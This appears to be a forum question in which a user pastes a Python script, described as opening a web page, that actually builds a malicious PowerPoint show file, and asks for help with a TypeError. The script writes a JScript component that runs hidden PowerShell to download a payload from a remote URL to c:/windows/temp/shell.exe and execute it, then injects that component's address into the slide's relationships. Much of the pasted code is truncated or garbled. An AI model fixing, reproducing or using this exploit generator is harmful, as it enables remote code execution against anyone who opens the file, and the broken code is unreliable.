I have the following code ( that I got from this article ), that what it does is open a external application such as a web page or a file by means of a powershell.
import getopt
import os
import shutil
import sys
import tempfile
from zipfile import *
opts, args = getopt.getopt(sys.argv[1:], "o:p:x:", ["output_filename=", "payload_uri", "xml_uri"])
if len(args) == 0:
print "Usage: %s input_filename -o output_filename -p payload_uri -x xml_uri\n" % os.path.basename(__file__)
print "\tinput_filename\t\tThe input ppsx file name.\n"
print "\t-o\t\tOutput .ppsx file name, (inlcude the .ppsx)."
print "\t-p\t\tThe payload exe or sct file url. It must be in an accessible web server. (Optional)"
print "\t-x\t\tThe full xml uri to be called by the ppsx file. It must be in an accessible web server.(Required)"
input_file_name = args[0]
output_file_name = "Output_" + args[0]
payload_uri = None
xml_uri = ""
for opt in opts:
if opt[0] == '-o':
output_file_name = opt[1]
elif opt[0] == '-p':
payload_uri = opt[1]
elif opt[0] == '-x':
xml_uri = opt[1]
if not xml_uri:
print "Usage: %s input_filename -o output_filename -p payload_uri -x xml_uri\n" % os.path.basename(__file__)
print "\tinput_filename\t\tThe input ppsx file name.\n"
print "\t-o\t\tOutput .ppsx file name, (inlcude the .ppsx)."
print "\t-p\t\tThe payload exe or sct file url. It must be in an accessible web server. (Optional)"
print "\t-x\t\tThe full xml uri to be called by the ppsx file. It must be in an accessible web server.(Required)"
if payload_uri:
xml_template = """<?xml version="1.0"?>
<component id='giffile'>
<script language='JScript'>
new ActiveXObject('WScript.shell').exec('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'PAYLOAD_URI\', \'c:/windows/temp/shell.exe\'); c:/windows/temp/shell.exe');
f = open(xml_uri[xml_uri.rfind("/")+1:], "w")
f.write(xml_template.replace("PAYLOAD_URI", payload_uri))
print "Generated " + xml_uri[xml_uri.rfind("/")+1:] + " successfully"
def example():
# Preparing malicious PPSX
shutil.copy2(input_file_name, output_file_name)
class UpdateableZipFile(ZipFile):
Add delete (via remove_file) and update (via writestr and write methods)
To enable update features use UpdateableZipFile with the 'with statement',
Upon __exit__ (if updates were applied) a new zip file will override the exiting one with the updates
class DeleteMarker(object):
def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=False):
# Init base
super(UpdateableZipFile, self).__init__(file, mode=mode,
# track file to override in zip
self._replace = {}
# Whether the with statement was called
self._allow_updates = False
def writestr(self, zinfo_or_arcname, bytes, compress_type=None):
if isinstance(zinfo_or_arcname, ZipInfo):
name = zinfo_or_arcname.filename
name = zinfo_or_arcname
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and name in self.namelist():
temp_file = self._replace[name] = self._replace.get(name,
# Otherwise just act normally
super(UpdateableZipFile, self).writestr(zinfo_or_arcname,
bytes, compress_type=compress_type)
def write(self, filename, arcname=None, compress_type=None):
arcname = arcname or filename
# If the file exits, and needs to be overridden,
# mark the entry, and create a temp-file for it
# we allow this only if the with statement is used
if self._allow_updates and arcname in self.namelist():
temp_file = self._replace[arcname] = self._replace.get(arcname,
with open(filename, "rb") as source:
shutil.copyfileobj(source, temp_file)
# Otherwise just act normally
super(UpdateableZipFile, self).write(filename,
arcname=arcname, compress_type=compress_type)
def __enter__(self):
# Allow updates
self._allow_updates = True
return self
def __exit__(self, exc_type, exc_val, exc_tb):
# call base to close zip file, organically
super(UpdateableZipFile, self).__exit__(exc_type, exc_val, exc_tb)
if len(self._replace) > 0:
# In case rebuild zip failed,
# be sure to still release all the temp files
self._allow_updates = False
def _close_all_temp_files(self):
for temp_file in self._replace.itervalues():
if hasattr(temp_file, 'close'):
def remove_file(self, path):
self._replace[path] = self.DeleteMarker()
def _rebuild_zip(self):
tempdir = tempfile.mkdtemp()
temp_zip_path = os.path.join(tempdir, 'new.zip')
with ZipFile(self.filename, 'r') as zip_read:
# Create new zip with assigned properties
with ZipFile(temp_zip_path, 'w', compression=self.compression,
allowZip64=self._allowZip64) as zip_write:
for item in zip_read.infolist():
# Check if the file should be replaced / or deleted
replacement = self._replace.get(item.filename, None)
# If marked for deletion, do not copy file to new zipfile
if isinstance(replacement, self.DeleteMarker):
del self._replace[item.filename]
# If marked for replacement, copy temp_file, instead of old file
elif replacement is not None:
del self._replace[item.filename]
# Write replacement to archive,
# and then close it (deleting the temp file)
data = replacement.read()
data = zip_read.read(item.filename)
zip_write.writestr(item, data)
# Override the archive with the updated one
shutil.move(temp_zip_path, self.filename)
with UpdateableZipFile(output_file_name, "a") as o:
slide_res_file = "ppt/slides/_rels/slide1.xml.rels"
string = o.read(slide_res_file)
if "" not in string:
print "Copy 'Code.exe' from the template to slide 1 of the input file and save it with extension .ppsx"
string = string.replace("", xml_uri)
o.writestr(slide_res_file, string)
print "Generated " + output_file_name + " successfully"
if xml_uri:
To execute it I do the following:
python generate_ppsx.py -o output.ppsx -p http://url file -x http://url xml template.ppsx
I get the following error when I execute it and I'm not sure how to correct it:
Traceback (most recent call last): File "generate_ppsx.py", line 188, in <module> generate_exploit_ppsx() File "generate_ppsx.py", line 177, in generate_exploit_ppsx with UpdateableZipFile(output_file_name, "a") as o: File "generate_ppsx.py", line 81, in __init__ super(UpdateableZipFile, self).__init__(file, mode=mode, TypeError: must be type, not classobj
What I do is comment the lines where they get the error, with UpdateableZipFile
, but the result I get is that it does not open because of the powershell.